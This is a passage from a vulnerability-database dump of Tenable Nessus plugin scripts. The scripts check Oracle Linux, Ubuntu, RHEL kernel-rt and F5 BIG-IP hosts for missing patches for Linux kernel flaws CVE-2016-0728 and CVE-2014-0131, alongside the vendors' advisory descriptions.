preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['3.8.13-118.2.5.el6uek', '3.8.13-118.2.5.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2016-3509');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '3.8';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-3.8.13-118.2.5.el6uek-0.4.5-3.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 
'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-118.2.5.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-118.2.5.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'},\n {'reference':'dtrace-modules-3.8.13-118.2.5.el7uek-0.4.5-3.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-118.2.5.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-118.2.5.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if 
(!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-3.8.13-118.2.5.el6uek / dtrace-modules-3.8.13-118.2.5.el7uek / kernel-uek / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:36", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. 
A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 15.04 : linux vulnerability (USN-2871-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2871-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88012", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2871-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88012);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2871-1\");\n\n script_name(english:\"Ubuntu 15.04 : linux vulnerability (USN-2871-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2871-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2871-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.04\", pkgname:\"linux-image-3.19.0-47-generic\", pkgver:\"3.19.0-47.53\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"linux-image-3.19.0-47-generic-lpae\", pkgver:\"3.19.0-47.53\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"linux-image-3.19.0-47-lowlatency\", pkgver:\"3.19.0-47.53\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:42", "description": "Updated kernel-rt packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in a certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for reporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-02-04T00:00:00", "type": "nessus", "title": "RHEL 7 : kernel-rt (RHSA-2016:0065)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2016-0065.NASL", "href": "https://www.tenable.com/plugins/nessus/88574", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0065. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88574);\n script_version(\"2.13\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0065\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2016:0065)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel-rt packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0728\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:0065\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0065\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:16:53", "description": "Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (SOL15699)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0131"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", 
"cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15699.NASL", "href": "https://www.tenable.com/plugins/nessus/86006", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15699.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86006);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2014-0131\");\n script_bugtraq_id(66101);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (SOL15699)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in the skb_segment function in\nnet/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers\nto obtain sensitive information from kernel memory by leveraging the\nabsence of a certain orphaning operation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15699\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15699.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
